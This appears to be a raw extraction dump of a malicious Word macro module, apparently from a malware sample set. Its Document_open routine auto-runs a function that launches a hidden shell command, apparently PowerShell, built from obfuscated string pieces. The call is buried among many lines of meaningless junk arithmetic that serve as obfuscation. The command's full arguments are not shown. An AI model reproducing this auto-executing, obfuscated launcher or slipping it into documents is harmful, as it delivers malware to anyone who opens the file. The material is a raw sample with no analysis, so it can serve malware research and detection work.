Filename     : ./macros/33831a851187345807a5154652ba2eb091c61a71692c6205b8d7ba890ed06466
OLE stream   : Macros/VBA/CiHHNPiVWVp
VBA filename : CiHHNPiVWVp.cls
----------------------------------------
Attribute VB_Name = "CiHHNPiVWVp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ZfpOouF()
On Error Resume Next
mKMRs = Tan(64876)
MVCkun = ZSQqOt
BhPmm = NXzsk
fAAZG = CDbl(uKDYm * CDbl(VABAG + Int(Kjpos * Rnd(78264)) * kNVWaJ * Log(91798 * zzRGSI - RYzdvF + Fix(51))))
GsPmM = Tan(67616)
QqHLz = CDbl(oYncO)
uljfIA = Tan(32032)
cUblpc = CBnKW
wjHJu = mvtlU
Etuja = CDbl(dvHiz * CDbl(tSbBMN + Int(UwcQlv * Rnd(51503)) * RKdYfV * Log(99351 * cZslrf - GNkHQ + Fix(51))))
UbLKI = Tan(31948)
dIozTL = CDbl(dJUdtd)
zcfas = Tan(76434)
qAXMt = bzzPL
zQEmY = lcEQd
wwIPE = CDbl(LnFaH * CDbl(owoKj + Int(zIKRw * Rnd(22053)) * pMVru * Log(96422 * KoYbQf - zJvGZJ + Fix(51))))
ZutWV = Tan(67325)
VLjzz = CDbl(OKpwLc)
YtEPU = Tan(35922)
vfobu = zwUHiq
KSocr = TjapTw
wmNzES = CDbl(pMVWwV * CDbl(vnWZz + Int(KSEBXj * Rnd(66678)) * XAHfQ * Log(32841 * PwufYi - zwSjW + Fix(51))))
CMskq = Tan(31698)
iiMZYj = CDbl(RLNqf)
ZfpOouF = ZAQhfKrzhu + VBA.Shell(jjZowsEEF + Chr(PROUXnw + vbKeyP + rpUbJUzbK) + "owers" + PQqVK + NDkWZJHwSw + UwjLz + okEzTabHzBL + cRZqYWA + ojhPBidkRv, 55450 - 55450)
VIVMwU = Tan(90141)
zMzzOE = IqvUs
hwhlUH = bulicB
KsEdV = CDbl(VkKaij * CDbl(GGmQV + Int(jWwzDG * Rnd(73731)) * VEiZGp * Log(86097 * IaSWQ - zoHHlu + Fix(51))))
cBivr = Tan(20860)
vBXjH = CDbl(jbBXuU)
FijwRV = Tan(35135)
sVjbq = VulaTJ
ENZvmI = QMGjrZ
XvYNhQ = CDbl(FEFCr * CDbl(wkPoN + Int(XkjnC * Rnd(24720)) * bIwkL * Log(55304 * LcAnw - EczJTs + Fix(51))))
AwMMK = Tan(39537)
IoIWA = CDbl(pMIUtZ)
End Function
Private Sub Document_open()
On Error Resume Next
OaWjh = Tan(75872)
wXpnDE = JwBzHH
RDorR = BOQqoa
XNIwU = CDbl(kwHWOp * CDbl(jasjI + Int(DPGoh * Rnd(84886)) * rjGdv * Log(71648 * ptnoff - FNJhaC + Fix(51))))
AwczS = Tan(80840)
DRYaE = CDbl(jAqda)
QCMQw = Tan(88015)
diCUq = BLiBF
mcONb = IEWfG
FjYmSc = CDbl(dYCTR * CDbl(OEGrG + Int(MfblNY * Rnd(80722)) * JBuiRB * Log(20469 * ZEWQUK - wjIzu + Fix(51))))
GdJjzO = Tan(95775)
dvLNc = CDbl(uciXCQ)
ZfpOouF
NUEWY = Tan(43154)
CtfIT = tcPQV
tGisJ = UQrRMF
lilAsa = CDbl(rGztFm * CDbl(jBizIj + Int(PWAJL * Rnd(3880)) * lTMozu * Log(18103 * HwoofP - HknXGl + Fix(51))))
vQswhO = Tan(35763)
krhYv = CDbl(mmEGr)
ovXUb = Tan(21605)
jkPRkH = UQdrJ
mUWGH = kIAVf
fiiVhL = CDbl(RitzUV * CDbl(cpljtU + Int(VlhXYB * Rnd(5598)) * lctko * Log(15874 * XAYhz - rtXBl + Fix(51))))
vGVGsk = Tan(57001)
KzBwI = CDbl(hwtQD)
End Sub

